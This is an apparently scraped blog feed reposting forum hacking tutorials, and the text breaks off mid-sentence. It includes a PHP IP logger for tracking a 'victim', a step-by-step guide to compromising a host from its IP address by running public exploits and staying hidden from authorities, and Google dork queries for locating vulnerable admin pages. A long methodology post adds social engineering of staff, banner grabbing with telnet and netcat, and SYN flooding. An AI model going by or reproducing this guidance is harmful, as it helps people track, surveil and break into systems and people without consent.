Quote:&lt;html&gt;&lt;br /&gt;    &lt;HEAD&gt;&lt;br /&gt;    &lt;TITLE&gt;IP LOGGER ( You have to Change That!)&lt;/TITLE&gt;&lt;br /&gt;    &lt;/HEAD&gt;&lt;br /&gt;&lt;br /&gt;    &lt;BODY&gt;&lt;br /&gt;    It's up to you! You can give some informations etc...&lt;br /&gt;    &lt;?&lt;br /&gt;    $ip = $REMOTE_ADDR;&lt;br /&gt;    $date = date("Y m d");&lt;br /&gt;    $time = date("h:i:s A");&lt;br /&gt;&lt;br /&gt;    $new_file = fopen("YOURFILE.txt", a);&lt;br /&gt;    fwrite($new_file, "$ip - $date - $time");&lt;br /&gt;    fclose($new_file);&lt;br /&gt;    ?&gt;&lt;br /&gt;    &lt;/BODY&gt;&lt;br /&gt;    &lt;/HTML&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Save this file as index.php. Then you have to copy this file to your webspace. ( At first you have to configurate your webspace, but I don't know which one you use, so I can't mention this step in this TUT...)&lt;br /&gt;You named this file index.php , so if someone enters your website, he'll be linked to YOURSITE.com/index.php . The script will create a new file, you can choose the name by changing the script a little bit. You should rename the .txt file, so it isn't too easy to find out where your log was saved. Maybe you can use an md5 generator to make an secure file.&lt;br /&gt;&lt;br /&gt;3. Your website!&lt;br /&gt;Your IP Logger works, but you have to style your website. It looks better and your victim will not ask you thousands of questions.&lt;br /&gt;Maybe you can place YouTube Vids on it - it's up to you!&lt;br /&gt;&lt;br /&gt;4. Send the link to your victim!&lt;br /&gt;Just give your victim your link. When he enters it, the logger will immediatly save his IP into the .txt file. You can look up your log, if you just go to the directory where you saved it and open your .txt file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I hope I can help you with this TUT. Sorry for my bad English.&lt;br /&gt;But keep in mind that some of the webspaces have already an IP Logger.&lt;br /&gt;from hackfourms&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-5741830605598102710?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/5741830605598102710/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-find-out-ip-address-using.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5741830605598102710'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5741830605598102710'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-find-out-ip-address-using.html' title='How to find out an IP address (using a webspace)'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6067928802357421190</id><published>2009-01-03T05:51:00.000-08:00</published><updated>2009-01-03T05:58:40.021-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IP'/><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><title type='text'>How to hack with a ip address</title><content type='html'>Tutorial: How to hack with a ip address&lt;br /&gt;So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.&lt;br /&gt;&lt;br /&gt;1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.&lt;br /&gt;&lt;br /&gt;Example 1:&lt;br /&gt;Idlescan using Zombie &lt;Domain Name&gt; (192.150.13.111:80); Class: Incremental&lt;br /&gt;Interesting ports on 208.225.90.120:&lt;br /&gt;(The 65522 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;25/tcp open smtp&lt;br /&gt;80/tcp open http&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;135/tcp open loc-srv&lt;br /&gt;443/tcp open https 1027/tcp open IIS&lt;br /&gt;1030/tcp open iad1&lt;br /&gt;2306/tcp open unknown&lt;br /&gt;5631/tcp open pcanywheredata&lt;br /&gt;7937/tcp open unknown&lt;br /&gt;7938/tcp open unknown&lt;br /&gt;36890/tcp open unknown&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running.&lt;br /&gt;&lt;br /&gt;2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.&lt;br /&gt;&lt;br /&gt;So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.&lt;br /&gt;So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.&lt;br /&gt;&lt;br /&gt;At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.&lt;br /&gt;&lt;br /&gt;There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.&lt;br /&gt;__________________________________________________ _______o_________&lt;br /&gt;&lt;br /&gt;So as a summary of how to 0Wn a box when you only have an IP Address&lt;br /&gt;Method Works On BOTH *Nix and Windoze&lt;br /&gt;&lt;br /&gt;****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****&lt;br /&gt;&lt;br /&gt;- Port Scan The Address And Record Open Ports&lt;br /&gt;- Telnet To Open Ports To Identify Software Running On Ports&lt;br /&gt;&lt;br /&gt;3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports&lt;br /&gt;&lt;br /&gt;- Record Banners And Take Note Of The Application Running and The Version Number&lt;br /&gt;- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.&lt;br /&gt;- Make a copy of some Proof-Of-Concept code for the vulnerability.&lt;br /&gt;&lt;br /&gt;*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*&lt;br /&gt;&lt;br /&gt;- Run The Exploit Against The Victim.&lt;br /&gt;- Reap The Cheap-Sh0t Ownage&lt;br /&gt;__________________________________________________ _______________&lt;br /&gt;**This document does not go into covering your tracks. If you dare try any of this stuff on a box you dont have consent to hack on, They will simply look at the logs and see your IP Address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine, the more info you have on the system the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilage escalation. Users are not Admins/Root**&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6067928802357421190?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6067928802357421190/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-hack-with-ip-address.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6067928802357421190'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6067928802357421190'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-hack-with-ip-address.html' title='How to hack with a ip address'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-5161288172121649044</id><published>2009-01-03T05:45:00.000-08:00</published><updated>2009-01-03T05:51:17.400-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>How To Use Google &amp; Optimize Google Search Results</title><content type='html'>TuT]How To Use Google &amp; Optimize Google Search Results...&lt;br /&gt;Google is the best search engine.&lt;br /&gt;We can obtain many information from Google.&lt;br /&gt;Many people in this forum need to learn how to use Google for 100%.&lt;br /&gt;It is great to know how to use Google.&lt;br /&gt;&lt;br /&gt;If we know the way to search Google,we can get a lot of valuable information.&lt;br /&gt;Some of the information maybe can assist us to hack.&lt;br /&gt;We can search for vulnerability sites to hack.&lt;br /&gt;&lt;br /&gt;All the command here must be type in Google search bar.&lt;br /&gt;All without quotes.&lt;br /&gt;Hehe&lt;br /&gt;&lt;br /&gt;Tutorial start from here:&lt;br /&gt;&lt;br /&gt;1.intitle:&lt;br /&gt;--For example, "intitle:login password".The title of all the search results will contain login password.&lt;br /&gt;&lt;br /&gt;2.inurl or allinurl:&lt;br /&gt;--For example, "allinurl:admin/login.asp.The urls of all the search results will all contain admin/login.asp.This command is good to find vulnerability sites.I prefer to use allinurl.&lt;br /&gt;&lt;br /&gt;3.filetype:&lt;br /&gt;--For example, "filetype:doc site:gov".This command will look for .doc at .gov sites.&lt;br /&gt;&lt;br /&gt;4.related:&lt;br /&gt;--For example, "related:www.friendster.com".This command will list out all the sites that are similar friendster.&lt;br /&gt;&lt;br /&gt;5.intext:&lt;br /&gt;--For example, "intext:hacking".This command will search for words in all the websites.&lt;br /&gt;&lt;br /&gt;6.index of /:&lt;br /&gt;--For example, "index of / admin".This command can let us to see something in index format.&lt;br /&gt;&lt;br /&gt;Some example to find valuable sites to be attacked:&lt;br /&gt;-allinurl:admin filetype:txt&lt;br /&gt;-allinurl:admin filetype:db&lt;br /&gt;-allinurl:admin filetype:cfg&lt;br /&gt;-allinurl:file_upload.php&lt;br /&gt;-allinurl:admin/login.asp&lt;br /&gt;&lt;br /&gt;This is my tutorial for you.&lt;br /&gt;Hope you all can get some useful information from this tutorial.&lt;br /&gt;&lt;br /&gt;Type in the command from this tutorial in Google search bar for more understanding.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Thanks...&lt;br /&gt;from hackforums&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-5161288172121649044?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/5161288172121649044/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-use-google-optimize-google.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5161288172121649044'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5161288172121649044'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-use-google-optimize-google.html' title='How To Use Google &amp; Optimize Google Search Results'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6711925866148726447</id><published>2009-01-03T05:30:00.000-08:00</published><updated>2009-01-03T05:43:06.236-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>How to Hack Websites &amp; Servers from Scratch!!! Step by Step Tutorial for Beginners</title><content type='html'>I'm going to provide the common methodology that is followed when hacking a machine/network/server. This tutorial will give you a good understanding &amp; an overview about professional penetration test in a black box (attacker) point of view. It is designed to give you the idea on how an attacker can break into your system, what am gonna say will increase your awareness &amp; will open the door for you to go out &amp; educate yourself easily. I gathered these info from various sources and tutorials, i have changed many stuff, clarified many parts, gave some references, and put many information together. I'm still a learner &amp; on the way to my goal. However, this won't prevent from teaching others what i have learned so far &amp; don't worry i'm not going to provide you any info that i'm not sure about yet. It is not the best tutorial out there, but at least it is a good starter. I will speak in a hacker (attacker or blackbox) point of view. I write this tutorial for educational purposes only.&lt;br /&gt;&lt;br /&gt;Since i'm not a native speaker, expect to see lots of grammar and spelling mistakes.&lt;br /&gt;&lt;br /&gt;Before you hack a system, you must decide what is your goal. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discover vulns &amp; see how you can exploit them, etc ... The point is you have to decide the goal.&lt;br /&gt;&lt;br /&gt;The most common goals are:&lt;br /&gt;&lt;br /&gt;1. breaking into the system &amp; taking the admin privileges.&lt;br /&gt;2. gaining sensitive data, such as credit cards, identification theft, etc.&lt;br /&gt;&lt;br /&gt;You should have all the tools ready before you start taking the steps of hacking. There is a *nix version called backtrack. It is an OS that comes various set of security tools that helps you hacking systems (doing penetration test).&lt;br /&gt;&lt;br /&gt;You should set the steps (methodology) that you have to take in your journey. There is a common methodology followed&lt;br /&gt;by hackers i will mention it below. However, you can create your own methodology if you know what u r doing.&lt;br /&gt;&lt;br /&gt;Common steps to be taken for hacking a system:&lt;br /&gt;&lt;br /&gt;1. Reconnaissance(footprinting).&lt;br /&gt;2. Scanning.&lt;br /&gt;3. Ports &amp; Services Enumeration.&lt;br /&gt;4. Vulnerability Assessment.&lt;br /&gt;5. Vulnerability Exploitation.&lt;br /&gt;6. Penetration and Access.&lt;br /&gt;7. Privilege Escalation &amp; owning the box.&lt;br /&gt;8. Erase tracks.&lt;br /&gt;9. Maintaining access.&lt;br /&gt;&lt;br /&gt;The above methodology can change referring to your goals. Feel free m8!&lt;br /&gt;&lt;br /&gt;Before you break into a system, you have to collect as much info as you can. You have to study your target well before you hack. This step is called Reconnaissance. Reconnaissance is achieved by you using techniques &amp; tools that undetectable by a target. You are gathering your target info that is publicly published, e.g. browse your target website &amp; if they are looking for a SQL employee and Windows server admin, then you get a hint that they are running Windows Server &amp; do SQL's, this is called a "passive" action. Lets an example of active action! Example of active action, call the company to obtain some info, visit the company, email employees to get some info, go to the target website &amp; read its source code. In other words, passive action means you gather info in non-intrusive manner. Active action is a step further, such as talking to the company as you are a customer, things like that. It is not really important to know what action is passive &amp; what is active, the main goal here to gather info! Simple ha? Good, let me go deeper little bit.&lt;br /&gt;&lt;br /&gt;In passive reconnaissance, there is 0 chance of getting caught ;-), as you only target publicly available info to give you the feel on how your target look like. Type of info you can gather through passive recon. are, names, phones numbers, location address, partner networks, and many more. This can aid you when you want to do some social engineering! Hence, sometimes you can get some non-public info is revealed when you do passive reconnaissance. There are several tools helps you to do passive reconnaissance, such as whois (who is). Whois helps you obtain extensive info, such as names, domains of the target, etc. Other great tools are, Sam Spad, domaintools, and google(can reveal lots of target subdomians &amp; many more).&lt;br /&gt;&lt;br /&gt;To know what is whois briefly, visit http://www.hackforums.net/showthread.php?tid=41568&lt;br /&gt;&lt;br /&gt;Active reconnaissance goes beyond the passive nature, such as communicating with target without being caught, such as scanning. Anything not discovered in IDS(Intrusion Detection System) is considered active. You have to think of ways to extract info of the company in a normal way, public way by going deeper little bit than passive recon. e.g. you can go to the physical location do some social engineering, email staff, communicate with employees based on info's you have got in passive recons. Things like that!&lt;br /&gt;&lt;br /&gt;Example of some techniques for active reconnaissance, such as banner grabbing, view company's public website source code and directory structure, social engineering, shoulder surfing, etc.&lt;br /&gt;&lt;br /&gt;What the heck is banner grabbing?&lt;br /&gt;You let the server sends you a block of information that tells you OS version of your target system &amp; various association with it&lt;br /&gt;Banner tells OS version n various association. Anything listens on a "port" can determine the operating system (OS) "the port" is running on, this called fingerprinting. In other words, fingerprinting is the process of determining the operating system (OS) or applications used by a remote target.&lt;br /&gt;&lt;br /&gt;Learn more about banner grabbing:&lt;br /&gt;http://www.net-square.com/httprint/httprint_paper.html&lt;br /&gt;&lt;br /&gt;Can you give a brief example of Social Engineering?&lt;br /&gt;For example, you try to know where IT admin goes after business hours, then start go to the place he goes &amp; build a relationship , start making a friend relationship to extract more info slowely but surely, things like that! you know what i mean.&lt;br /&gt;&lt;br /&gt;What is shoulder surfing?&lt;br /&gt;Simply, stands behind a person shoulder and see what the guy is doing &amp; typing on keyboard. This can happen in wireless network area where everyone is using a laptop in public areas.&lt;br /&gt;&lt;br /&gt;In summary, reconnaissance is one of the most important steps in hacking. The main concept is to gather all info that publicly available or easy obtainable. Info that we gather will help us in social engineering and research purpose swhich will lead you to very critical info about the system. It starts by obtaining names, phones, emails, IP range, domain structure, and so on.&lt;br /&gt;&lt;br /&gt;let me show you how banner grabbing is done, telnet on your target server on port 80 as following, go to command line or terminal and type&lt;br /&gt;&lt;br /&gt;telnet xx.xxx.xxx.xxx 80&lt;br /&gt;&lt;br /&gt;Now connection is established, that stupid server thinks you are web browser connected to it, it waits you to enter commands so the server can you give you info about your request. In this situation, you have to write a command that says "Hey you web server, give me a content of sucn and such website". However, we do not really want to visit the website through telnet, do you? You can just go to web browser &amp; request the website from there. Our purpose here is to freak the server out enough, so it spits back a code that says, hey! this doesn't work but here is some info that might help you do some trouble shooting. This technique allows you to finger print various component of the target system.&lt;br /&gt;&lt;br /&gt;Note: instead telnet xxx.xx.xxx.xx 80, you can do nc xxx.xx.xxx.xxx 80! Same thing ... nc stands for netcat ... xx.xxx.xx.xxx represents IP address of the target system.&lt;br /&gt;&lt;br /&gt;After you do telnet xxx.xx.xxx.xxx 80, the remote sever will wait you to enter a command. Type this:&lt;br /&gt;&lt;br /&gt;HEAD / HTTP/1.0&lt;br /&gt;&lt;br /&gt;Then you will get a reply looks similar to:-&lt;br /&gt;&lt;br /&gt;HTTP/1.1 200 OK&lt;br /&gt;Date: Mon, 16 Jun 2003 02:53:29 GMT&lt;br /&gt;Server: Apache/1.3.3 (Unix) (Red Hat/Linux)&lt;br /&gt;Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT&lt;br /&gt;ETag: "1813-49b-361b4df6"&lt;br /&gt;Accept-Ranges: bytes&lt;br /&gt;Content-Length: 1179&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html&lt;br /&gt;&lt;br /&gt;So the header response brought back some important info that says, the server runs: Apache/1.3.23 in UNIX OS for Red Hat distribution of Linux.&lt;br /&gt;&lt;br /&gt;OR you might get header that looks similar to the following:&lt;br /&gt;&lt;br /&gt;HTTP/1.1 200 OK&lt;br /&gt;Server: Microsoft-IIS/5.0&lt;br /&gt;Expires: Tue, 17 Jun 2003 01:41:33 GMT&lt;br /&gt;Date: Mon, 16 Jun 2003 01:41:33 GMT&lt;br /&gt;Content-Type: text/html&lt;br /&gt;Accept-Ranges: bytes&lt;br /&gt;Last-Modified: Wed, 28 May 2003 15:32:21 GMT&lt;br /&gt;ETag: "b0aac0542e25c31:89d"&lt;br /&gt;Content-Length: 7369&lt;br /&gt;&lt;br /&gt;It means, the server runs: Microsoft-IIS/5.0 in Win 2000 or Win 2003 (we don't the Windows version yet).&lt;br /&gt;&lt;br /&gt;OR you might get header that looks similar to the following:&lt;br /&gt;&lt;br /&gt;Date: Thu, 04 Dec 2008 02:18:46 GMT&lt;br /&gt;Server: Apache/1.3.41 (Unix) PHP/4.4.8 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8b&lt;br /&gt;Last-Modified: Thu, 10 Jul 2008 23:34:28 GMT&lt;br /&gt;ETag: "c9865b-d91-48769c84"&lt;br /&gt;Accept-Ranges: bytes&lt;br /&gt;Content-Length: 3473&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html&lt;br /&gt;&lt;br /&gt;It means, the server runs: Apache/1.3.41 in UNIX box, running PHP/4.4.8&lt;br /&gt;&lt;br /&gt;Ok, you get it now?&lt;br /&gt;&lt;br /&gt;lets say our target got the following version: the server runs: Apache/1.3.41 in UNIX box, running PHP/4.4.8&lt;br /&gt;&lt;br /&gt;At this point if you know any vulnerability for this particular OS or this particular Apache or PHP. You can start doing the exploitation process ;-) ...&lt;br /&gt;&lt;br /&gt;Another example, use program called sam-spade which gives you alot of the info about your target. The target does not know actually what we are doing against their server, since they haven't seen anything been triggered by IDS or Firewall.&lt;br /&gt;&lt;br /&gt;*What is the difference between IDS &amp; Firewall?&lt;br /&gt;An IDS (Intrusion Detection System) may only detect and warn you of a violation of your privacy. Although most block major attacks, some probes or other attacks may just be noted and allowed through. There's also an evolution of the IDS called an IPS (Intrusion Prevention System) that watches for the same things an IDS does, but instead of just alerting, it blocks the traffic.&lt;br /&gt;&lt;br /&gt;A good firewall will block almost all attacks unless specified otherwise or designed otherwise. The only problem is, the firewall might not warn you of the attacks and may just block them.&lt;br /&gt;&lt;br /&gt;It may be a good idea to have both an IDS and a Firewall, because the IDS will warn you and then the firewall will block the attack. Over the years, firewalls got more complex and added more features. One of these features is actually IDS - today you can have a firewall that already has ID(Firewall/IDS's are combined into one internet security program).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Learn more about banner grabbing:&lt;br /&gt;http://www.net-square.com/httprint/httprint_paper.html&lt;br /&gt;&lt;br /&gt;To learn how to do through Google, you need like the following book:&lt;br /&gt;http://www.amazon.com/exec/obidos/ASIN/1.../ref=nosim&lt;br /&gt;&lt;br /&gt;Note: the book in amazon is just an example for you to give you an idea of what kind of book you should be looking for - if you are interested.&lt;br /&gt;&lt;br /&gt;Alright, now you at least have an idea of what reconnaissance is! lets talk about scanning...&lt;br /&gt;&lt;br /&gt;When you scan your target's network, you actually start touching the system. Scanning a network determines whats in there, scanning network gives you the feel how is your target network is laid out such as if there are multiple subnets, which hosts are alive, check ports, see if system is alive, discover available hosts &amp; get info about the discovered hosts. There are thousands of tools can be used to scan networks! Scanning a network can easily get picked up by IDS. Anyhow, no one will pay attention except if you do it over and over because scans happens on such a regular basis on the internet. Therefore, people who read the logs, i means the webmaster won't really pay attention to every single scan occurs, so you don't have to worry alot. There are ways to avoid being picked up by IDS :-). After you finish scanning, you will gain a list of network nodes that exists there.&lt;br /&gt;&lt;br /&gt;"Node" is an active electronic device that is attached to a network, and is capable of sending, receiving, or forwarding information over a communications channel. If you want to learn more,google it or visit http://en.wikipedia.org/wiki/Node_(networking) ...&lt;br /&gt;&lt;br /&gt;Ok now we want to discover live hosts via scanning. This is the first action taken against your target network network. Depending on method of scanning you use, you can be detected by IDS. Most admins will ignore detections because it happens alot unless something abnormal happens.&lt;br /&gt;&lt;br /&gt;There are various scanner tools, e.g. nmap, superscan, and many more. There are various scan methods, some are stealthy, others are not.&lt;br /&gt;&lt;br /&gt;Before i talk about various scanning methods, let me explain to you about TCP connections basics. When you scan your target using TCP communication, there are six TCP flags can be utilized during packet transmission(packets get transmitted during scanning process). A flag will indicate whether the sent packets are syn, ack, fin, urg, psh, or rst packets. These packets sets you in a position on how you want to communicate with the remote host. You can get different info depending on the flag you choose for the scanning.&lt;br /&gt;&lt;br /&gt;TCP establishes three handshakes, syn, syn-ack, ack. What are they?&lt;br /&gt;When you scan your target using TCP communication, you send a syn packet(syn request), and then target sends you back an ack packet with syn packet. Now, you send an ack packet to the target. So now both machines establish the connection well, like they have made a well established tunnel for a proper guaranteed communication without losing any packets during communicating with each other. A hacker can get caught easily if he uses this method to hack other systems illegally.&lt;br /&gt;&lt;br /&gt;Hackers use non-standard combination of these six flags, which gives them info that are not normally available to the public.&lt;br /&gt;&lt;br /&gt;Have you heard about syn flood?&lt;br /&gt;syn flood is done by utilizing three handshake by sending "syn" request to the target, so the target receives a syn request and send an a syn-ack back to the originator(you). You ignore the target syn-ack request - when you ignore it, then the three handshakes is not completed, this is called half open TCP connection - In theory, when the target sends you syn-ack, the target allocates some RAM on its machine.&lt;br /&gt;&lt;br /&gt;The amount of RAM on the target machine must be open until it gets response (ack packet) back from you because till now only two handshake has been made,so the TCP connection process is not completed yet. However, there is always a time limit for the RAM to be opened, so if 30 secs passed by &amp; the target did not get the ack from you, the connection will abort(failed TCP handshake - timeout) &amp; RAM will be deallocated.&lt;br /&gt;&lt;br /&gt;The idea here is to send hell alot of packets in few secs so in 30 secs, you can send 40 million packets(lets say one packet size is 1kb) which is heavy on the RAM since the RAM might not have enough memory to carry 40 million packets. Therefore, you force the target to make half open TCP connection attempts, so definitely the target machine will stop responding to legitimate request. In other words, if you send 40 million syn requests to that remote host, it's going to allocate a hell of a lot of ram for those requests. After a while, it's going to eat up all of the ram. Thus, target system goes down. This is called syn flood attack.&lt;br /&gt;&lt;br /&gt;In short, syn flood attack makes the system (i.e. the IP stack or kernel) chokes on the memory allocations (or simply runs out of memory) or the target application (i.e. web server) chokes on the processing load. You got it? Or not yet?! Syn flood is an old technique i just mentioned it here for illustration purposes.&lt;br /&gt;&lt;br /&gt;General Information: these days, SYN floods are used to make systems inaccessible. They have a limited number of half open connections, you use them all, and they can't accept any more SYNs. But again, modern software throws away old SYNs once the limit is reached. Note that different systems will behave differently.&lt;br /&gt;&lt;br /&gt;If you interested in learning more about syn flood, visit&lt;br /&gt;http://tools.ietf.org/html/rfc4987&lt;br /&gt;&lt;br /&gt;Lets talk about the most common TCP Scan types. There are full scan, half open scan, stealth scan, Xmas scan, and ack scan.&lt;br /&gt;&lt;br /&gt;full scan: this completes 3 way TCP. it is the most effective &amp; gives more accurate results. However, it is not safe and easily traced and detected.&lt;br /&gt;&lt;br /&gt;half open scan: it is the second most effective scanning method, only uses first part of the handshake to get syn-ack but does not send 3rd part (ack) back to the remote host. The idea here is if the remote replies back to you after you have sent syn request, this means the port - we sent the syn to - must be open.&lt;br /&gt;&lt;br /&gt;stealth scan: the idea here is to scan ports randomly(not in sequential order) &amp; reduce the speed of scanning. If you scan all port from 1 to 65536 in sequence, your more visible to be detected, and usually scanning happens so fast, which is unusual since regular 